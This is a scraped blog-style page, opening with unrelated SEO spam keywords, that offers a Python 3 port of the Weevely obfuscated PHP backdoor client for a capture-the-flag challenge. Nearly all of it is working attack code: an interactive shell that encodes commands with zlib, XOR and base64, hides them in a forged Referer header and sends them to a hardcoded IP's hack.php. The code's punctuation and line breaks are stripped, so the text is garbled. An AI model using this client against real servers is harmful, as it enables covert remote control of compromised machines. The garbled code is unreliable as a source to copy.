网站建设有那些步骤,seo平台,58同城二手房,建设招标网官方网站网上的wp中关于Web_php_wrong_nginx_config的后门代码都是python2的#xff08;源码来自#xff1a;Weevely#xff1a;一个 PHP 混淆后门的代码分析 - Phukers Blog#xff09;
以下是转换成python3的版本
# encoding: utf-8from random import randint, choice
from ha… 网上的wp中关于Web_php_wrong_nginx_config的后门代码都是python2的源码来自Weevely一个 PHP 混淆后门的代码分析 - Phukers Blog
以下是转换成python3的版本
# encoding: utf-8from random import randint, choice
from hashlib import md5
import urllib.parse
import string
import zlib
import base64
import requests
import redef choicePart(seq, amount):length len(seq)if length 0 or length amount:print(Error Input)return Noneresult []indexes []count 0while count amount:i randint(0, length - 1)if i not in indexes:indexes.append(i)result.append(seq[i])count 1if count amount:return resultdef randBytesFlow(amount):result bfor i in range(amount):result bytes([randint(0, 255)])return resultdef randAlpha(amount):result for i in range(amount):result choice(string.ascii_letters)return resultdef loopXor(text, key):result blenKey len(key)lenTxt len(text)iTxt 0while iTxt lenTxt:iKey 0while iTxt lenTxt and iKey lenKey:result bytes([key[iKey] ^ text[iTxt]])iTxt 1iKey 1return resultdef debugPrint(msg):if debugging:print(msg)# config
debugging False
keyh 42f7 # $kh
keyf e9ac # $kf
xorKey keyh keyf
url http://61.147.171.105:51610/hack.php
defaultLang zh-CN
languages [zh-TW;q0.%d, zh-HK;q0.%d, en-US;q0.%d, en;q0.%d]
proxies None # {http:http://127.0.0.1:8080} # proxy for debugsess requests.Session()
# generate random Accept-Language only once each session
langTmp choicePart(languages, 3)
indexes sorted(choicePart(range(1, 10), 3), reverseTrue)
acceptLang [defaultLang]
for i in range(3):acceptLang.append(langTmp[i] % (indexes[i],))
acceptLangStr ,.join(acceptLang)
debugPrint(acceptLangStr)
init2Char acceptLang[0][0] acceptLang[1][0] # $i
md5head (md5((init2Char keyh).encode(utf-8)).hexdigest())[0:3]
md5tail (md5((init2Char keyf).encode(utf-8)).hexdigest())[0:3] randAlpha(randint(3, 8))
debugPrint($i is %s % (init2Char,))
debugPrint(md5 head: %s % (md5head,))
debugPrint(md5 tail: %s % (md5tail,))
# Interactive php shell
cmd input(phpshell )
while cmd ! :# build junk data in refererquery []for i in range(max(indexes) 1 randint(0, 2)):key randAlpha(randint(3, 6))value base64.urlsafe_b64encode(randBytesFlow(randint(3, 12))).decode(utf-8)query.append((key, value))debugPrint(Before insert payload:)debugPrint(query)debugPrint(urllib.parse.urlencode(query))# encode payloadpayload zlib.compress(cmd.encode(utf-8))payload loopXor(payload, xorKey.encode(utf-8))payload base64.urlsafe_b64encode(payload).decode(utf-8)payload md5head payload# cut payload, replace into referercutIndex randint(2, len(payload) - 3)payloadPieces (payload[0:cutIndex], payload[cutIndex:], md5tail)iPiece 0for i in indexes:query[i] (query[i][0], payloadPieces[iPiece])iPiece 1referer url ? urllib.parse.urlencode(query)debugPrint(After insert payload, referer is:)debugPrint(query)debugPrint(referer)# send requestr sess.get(url, headers{Accept-Language: acceptLangStr, Referer: referer}, proxiesproxies)html r.textdebugPrint(html)# process responsepattern re.compile(r%s(.*)/%s % (xorKey, xorKey))output pattern.findall(html)if len(output) 0:print(Error, no backdoor response)cmd input(phpshell )continueoutput output[0]debugPrint(output)output base64.b64decode(output.encode(utf-8))output loopXor(output, xorKey.encode(utf-8))output zlib.decompress(output).decode(utf-8)print(output)cmd input(phpshell )
